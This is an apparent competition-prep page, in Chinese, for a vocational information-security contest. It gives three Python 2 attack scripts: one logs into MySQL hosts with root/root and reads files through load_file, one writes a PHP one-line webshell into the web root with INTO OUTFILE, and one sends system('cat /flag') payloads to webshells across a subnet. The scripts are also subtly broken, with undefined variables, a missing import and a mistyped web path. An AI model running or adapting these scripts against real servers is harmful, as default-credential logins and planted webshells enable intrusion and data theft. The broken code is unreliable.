全国职业技能大赛信息安全管理与评估-MySQL弱口令利用

MySQL读文件

#coding=utf-8
import MySQLdb
host = '172.16.1.'
for i in range(129,131):
    tag = host+str(i)
    print tag+"3306"
    try:
        MySQLdb.connect(tag,3306,'root','root','mysql',timeout=1)
        cur = conn.cursor()
        cur.execute("select load_file('/root/flag.txt')")
        print cur.fetchone()
        cur.close()
    except:
        print 'MYSQL connect out'
conn.commit()
conn.close()

MySQL写入一句话木马

#coding=utf-8
import MySQLdb
host = '172.16.1.'
try:
    conn = MySQLdb.connect(host=host,port=3306,user='root',passwd='root',db='mysql',connect_timeout=1)
    cur = conn.cursor()
    cur.execute("""create table sys(cmd text NOT NULL);""")
    cur.execute("""insert into sys(cmd)values("<?php system('cat /root/flaginfo*');?>");""")
    cur.execute("""select * from sys into outfile "/val/www/html/sys.php";""")
    os.system("curl "+tag+"/sys.php")
except:
    print 'Mysql time out'

webshell利用

#!usr/bin/python
import urllib,urllib2
for i in range(1,10):
    tag = 'http://172.16.'+str(i)+'.113/add_book.php'
    data = {"password":"system('cat /flag');"}
    print tag
    try:
        f = urllib2.urlopen(url=tag,data=urllib.urlencode(data),timeout=1)
        flag = f.read()
        print flag[0:40]
    except:
        print 'time out'